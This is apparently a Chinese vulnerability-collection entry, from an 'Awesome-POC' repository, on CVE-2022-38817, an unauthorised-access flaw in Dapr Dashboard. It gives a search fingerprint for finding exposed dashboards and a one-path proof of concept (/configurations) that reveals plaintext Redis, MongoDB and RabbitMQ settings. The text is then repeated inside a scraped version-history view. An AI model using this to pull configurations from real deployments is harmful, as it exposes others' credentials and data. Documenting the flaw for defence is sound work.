Awesome-POC/Web应用漏洞/Dapr Dashboard configurations 未授权访问漏洞 CVE-2022-38817.md

# Dapr Dashboard configurations 未授权访问漏洞 CVE-2022-38817

## 漏洞描述

Dapr Dashboard 存在 未授权访问漏洞，在未经授权的情况下获取云上redis、mongodb、rabbitmq等应用的明文配置信息，并可以进一步利用这些配置信息获取云上的敏感数据

## 漏洞影响

```
Dapr Dashboard
```

## 网络测绘

```
"Dapr Dashboard"
```

## 漏洞复现

主页面

![image-20221017171042042](./images/202210171710081.png)

验证POC

```
/configurations
```

![image-20221017171055193](./images/202210171710235.png)

![image-20221017171111046](./images/202210171711095.png)
-												更新漏洞库：Web应用漏洞/

											
										
										
											2022-10-17 17:17:13 +08:00
+								# Dapr Dashboard configurations 未授权访问漏洞 CVE-2022-38817
 								## 漏洞描述
 								Dapr Dashboard 存在 未授权访问漏洞，在未经授权的情况下获取云上redis、mongodb、rabbitmq等应用的明文配置信息，并可以进一步利用这些配置信息获取云上的敏感数据
 								## 漏洞影响
 								```
 								Dapr Dashboard
 								```
-												更新漏洞

											
										
										
											2023-08-28 15:55:36 +08:00
+								## 网络测绘
-												更新漏洞库：Web应用漏洞/

											
										
										
											2022-10-17 17:17:13 +08:00
 								```
 								"Dapr Dashboard"
 								```
 								## 漏洞复现
 								主页面
-												更新漏洞

											
										
										
											2022-12-05 11:09:28 +08:00
+								![image-20221017171042042](./images/202210171710081.png)
-												更新漏洞库：Web应用漏洞/

											
										
										
											2022-10-17 17:17:13 +08:00
 								验证POC
 								```
 								/configurations
 								```
-												更新漏洞

											
										
										
											2022-12-05 11:09:28 +08:00
+								![image-20221017171055193](./images/202210171710235.png)
-												更新漏洞库：Web应用漏洞/

											
										
										
											2022-10-17 17:17:13 +08:00
-												更新漏洞

											
										
										
											2022-12-05 11:09:28 +08:00
+								![image-20221017171111046](./images/202210171711095.png)